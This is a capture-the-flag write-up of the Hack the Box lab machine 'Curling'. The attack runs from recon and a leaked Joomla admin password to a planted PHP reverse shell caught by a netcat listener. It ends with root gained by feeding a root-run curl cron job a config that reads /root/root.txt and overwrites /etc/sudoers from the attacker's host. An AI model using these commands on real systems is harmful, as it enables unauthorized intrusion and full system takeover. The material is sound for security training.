Hack the Box Curling
My write-up on HTB’s retired machine “Curling”.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
Used nmapAutomator to automate the recon/enumeration process; here is a summary of the output.
└──╼ $/home/arcy24/Documents/tools/new/nmapAutomator/./nmapAutomator.sh 10.129.71.21 All
Running all scans on 10.129.71.21
Host is likely running Linux
---------------------Starting Nmap Quick Scan---------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:41 EST
Nmap scan report for 10.129.71.21
Host is up (0.095s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds
GoBuster results:
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://curling.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/27 07:21:51 Starting gobuster
===============================================================
/administrator (Status: 301)
/bin (Status: 301)
/cache (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/libraries (Status: 301)
/modules (Status: 301)
/templates (Status: 301)
/tmp (Status: 301)
===============================================================
2020/12/27 07:22:00 Finished
===============================================================
Enumeration
Web recon on “http://curling.htb”.
To get name resolution working, edit the /etc/hosts file and add the IP address of HTB's "Curling" machine.
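A quick way to do that from the attacking box (using the target IP from the nmap scan above):
echo "10.129.71.21 curling.htb" | sudo tee -a /etc/hosts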
Conducting further enumeration using wfuzz.
Options that I used:
- -c: colored output
- -w: path to the wordlist
- -z: add the extensions php, html, and txt
- --hc 404,403: hide HTTP response codes 404 and 403
└──╼ $sudo wfuzz -c -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html-.txt --hc 404,403 http://curling.htb/FUZZFUZ2Z
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.0.1 - The Web Fuzzer *
********************************************************
Target: http://curling.htb/FUZZFUZ2Z
Total requests: 18456
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 361 L 1051 W 14239 Ch "http://curling.htb/"
000001273: 301 9 L 28 W 318 Ch "administrator"
000002509: 301 9 L 28 W 308 Ch "bin"
000002917: 301 9 L 28 W 310 Ch "cache"
000003909: 301 9 L 28 W 315 Ch "components"
000003986: 200 0 L 0 W 0 Ch "configuration - .php"
000007961: 301 9 L 28 W 311 Ch "images"
000008066: 200 361 L 1051 W 14260 Ch "index - .php"
000008049: 301 9 L 28 W 313 Ch "includes"
000008081: 200 361 L 1051 W 14260 Ch "index.php"
000008941: 301 9 L 28 W 313 Ch "language"
000009013: 301 9 L 28 W 312 Ch "layouts"
000009128: 200 339 L 2968 W 18092 Ch "LICENSE - .txt"
000009101: 301 9 L 28 W 314 Ch "libraries"
000009889: 301 9 L 28 W 310 Ch "media"
000010265: 301 9 L 28 W 312 Ch "modules"
000012009: 301 9 L 28 W 312 Ch "plugins"
000013180: 200 72 L 540 W 4872 Ch "README - .txt"
000014148: 200 1 L 1 W 17 Ch "secret - .txt"
000015977: 301 9 L 28 W 314 Ch "templates"
000016273: 301 9 L 28 W 308 Ch "tmp"
000017460: 200 31 L 90 W 1690 Ch "web.config - .txt"
Total time: 0
Processed Requests: 18456
Filtered Requests: 18434
Requests/sec.: 0
Based on the wfuzz results, here is the list of files and directories we could continue exploring:
- /administrator
- /templates
- secret.txt
- web.config.txt
Let's figure out what the encoded text in secret.txt is by using our favorite tool, CyberChef.
The data is Base64-encoded; decoding it yields "Curling2018".
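For reference, the same decoding can be done straight from the shell; a quick sketch, with the Base64 string re-derived here from the decoded value rather than copied from secret.txt:
echo 'Q3VybGluZzIwMTg=' | base64 -d    # prints: Curling2018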
Since we do not have any usernames to pair with this password, we could use a tool called cewl to generate possible usernames from the "Cewl Curling Site"; however, I did notice that the admin (superuser) name might be "Floris".
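If the username had not been obvious, a cewl run along these lines (output filename is hypothetical) would build a candidate word list from the site:
cewl http://curling.htb -m 5 -w curling_words.txt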
Logged in as user “Floris” with the password “Curling2018”
Browsing through the Joomla admin site to see if we can find a feature that lets us get a system shell.
Found the Templates section.
Modify a template and use PentestMonkey's php-reverse-shell.php. The script is located in /usr/share/webshells/php/ on Kali or Parrot OS.
I used the Beez3 template and decided to create my own PHP file instead of modifying any of the existing .php files within the template.
Use "Create New File" and save it with a .php extension.
Paste in the reverse shell code, change the IP and port (your IP and any port of your choosing), then save the file.
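A quick way to prepare the payload on the attacking box before pasting it into the Joomla editor, assuming the stock script still uses its default placeholders of 127.0.0.1 and port 1234:
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
sed -i 's/127.0.0.1/10.10.14.28/; s/1234/4444/' shell.php    # set attacker IP and listener port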
Set up a netcat listener on port 4444.
Initial Foothold
Launch the reverse shell PHP file via the browser. To determine the exact path of the PHP file, I had to check the page source of the default page to figure out how to load my reverse shell file.
┌─[✗]─[arcy24@parrot]─[~/Documents/htb/Curling]
└──╼ $sudo rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.28] from (UNKNOWN) [10.129.74.128] 56886
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
02:40:51 up 11:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
$
Upgrade shell
#check python version
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/share/python
#upgrade shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@curling:/$
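Optionally, the PTY can be stabilized further with the usual background/foreground trick (the TERM value is an assumption):
# press Ctrl-Z to background the reverse shell, then on the attacking box:
stty raw -echo; fg
# press Enter, then back inside the reverse shell:
export TERM=xterm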
Further enumeration
Browsed through /home/floris and identified its folders and files.
Access is denied on user.txt and the admin-area folder; however, we can read the password_backup file.
Deciphering the hexdump file is a bit challenging on the CLI, so I decided to use our favorite tool again, CyberChef.
Determine the file type of the initial output.
Added "Detect File Type", which identified Bzip2.
Added "Bzip2 Decompress", which gave us Gzip.
Added "Gunzip", which gave us Bzip2 again.
Added another "Bzip2 Decompress", and we got a TAR archive.
Added "Untar", which finally gave us the password.txt file (notice I disabled the "Detect File Type" operation).
Save password.txt file
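For reference, the same chain CyberChef revealed can be reproduced on the CLI; a rough sketch with hypothetical intermediate filenames:
xxd -r password_backup > layer1    # reverse the hexdump back to raw bytes
bzcat layer1 > layer2              # first bzip2 layer -> gzip data
zcat layer2 > layer3               # gzip layer -> bzip2 data again
bzcat layer3 > layer4              # second bzip2 layer -> tar archive
tar xf layer4                      # extracts password.txt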
Switched to user floris and was able to log in.
User flag obtained
Privilege Escalation
Ran linPEAS and also used another tool called pspy, which can snoop on processes without the need for root permissions.
Running ./pspy64s revealed that curl is executed by a root cron job every minute:
2021/01/02 05:31:01 CMD: UID=0 PID=17026 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2021/01/02 05:31:01 CMD: UID=0 PID=17025 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2021/01/02 05:31:01 CMD: UID=0 PID=17024 | /usr/sbin/CRON -f
2021/01/02 05:31:01 CMD: UID=0 PID=17023 | /usr/sbin/CRON -f
Since this box is titled "Curling", we'll assume that privilege escalation involves curl. Further research showed that curl's -K option loads a config file. Here is the relevant excerpt from the curl man page:
Specify the filename to -K, --config as '-' to make curl read the file from stdin.
Note that to be able to specify a URL in the config file, you need to specify it using the --url option, and not by simply writing the URL on its own line. So, it could look similar to this:
url = "https://curl.haxx.se/docs/"
When curl is invoked, it (unless -q, --disable is used) checks for a default config file and uses it if found. The default config file is checked for in the following places in this order:
1) curl tries to find the "home dir": It first checks for the CURL_HOME and then the HOME environment variables. Failing that, it uses getpwuid() on Unix-like systems (which returns the home dir given the current user in your system). On Windows, it then checks for the APPDATA variable, or as a last resort the '%USERPROFILE%\Application Data'.
2) On Windows, if there is no .curlrc file in the home dir, it checks for one in the same dir the curl executable is placed. On Unix-like systems, it will simply try to load .curlrc from the determined home dir.
# --- Example file ---
# this is a comment
url = "example.com"
output = "curlhere.html"
user-agent = "superagent/1.0"
# and fetch another URL too
url = "example.com/docs/manpage.html"
-O
referer = "http://nowhereatall.example.com/"
# --- End of example file ---
This option can be used multiple times to load multiple config files.
Digging further into curl, we could have the cron job fetch a config file we control and see if we can escalate user floris to root. I took the sudoers file from my own box and added an entry for floris; we will use it to replace the sudoers file on the "Curling" box, as sketched below.
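The only real change to that sudoers copy is an entry granting floris full sudo rights; a typical line (an assumption of what I added) looks like:
floris ALL=(ALL:ALL) ALL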
The input and report files are created with root privileges (the cron job runs as UID 0).
Speaking of curling, we could also use the command below to read root.txt by leveraging the curl cron job that we saw earlier in pspy.
floris@curling:~/admin-area$ echo 'url = "file:///root/root.txt"' > input
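After the cron job fires (within a minute), the output lands in the report file, since the job writes there with -o:
floris@curling:~/admin-area$ cat report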
To escalate user floris, we have to run the echo command below and serve the sudoers file that we modified earlier.
Load up the http server:
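One simple way to serve the modified sudoers file from the attacking box, assuming it sits in the current directory, is Python's built-in web server on port 80 (to match the URL used below):
sudo python3 -m http.server 80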
Run the echo command to modify the input file on "Curling" so that the cron job downloads our modified sudoers file and overwrites the sudoers file on the "Curling" host.
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.28/sudoers"\noutput = "/etc/sudoers"' > input
Once executed, you will see that the input file has been replaced:
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.28/sudoers"\noutput = "/etc/sudoers"' > input
floris@curling:~/admin-area$ cat input
url = "http://10.10.14.28/sudoers"
output = "/etc/sudoers"
Cue the cron job: shortly after, the modified sudoers file is downloaded and written to /etc/sudoers.
Root flag
#sudo su and use the same password as floris
floris@curling:~/admin-area$ sudo su
[sudo] password for floris:
root@curling:/home/floris/admin-area# whoami
root
root@curling:/home/floris/admin-area# hostname
curling
root@curling:/home/floris/admin-area# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.74.128 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:80d0 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:80d0 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:80:d0 txqueuelen 1000 (Ethernet)
RX packets 168164 bytes 25628058 (25.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 139095 bytes 54461776 (54.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 51861 bytes 15318270 (15.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 51861 bytes 15318270 (15.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Lessons learned
- Web fuzzing using wfuzz; a different method to obtain web paths, folders, and files.
- Dealing with different file compression formats (thank you, CyberChef).
- CyberChef: a Swiss Army knife web app for encryption, encoding, compression, and data analysis.
- pspy: a tool designed to snoop on processes without the need for root permissions.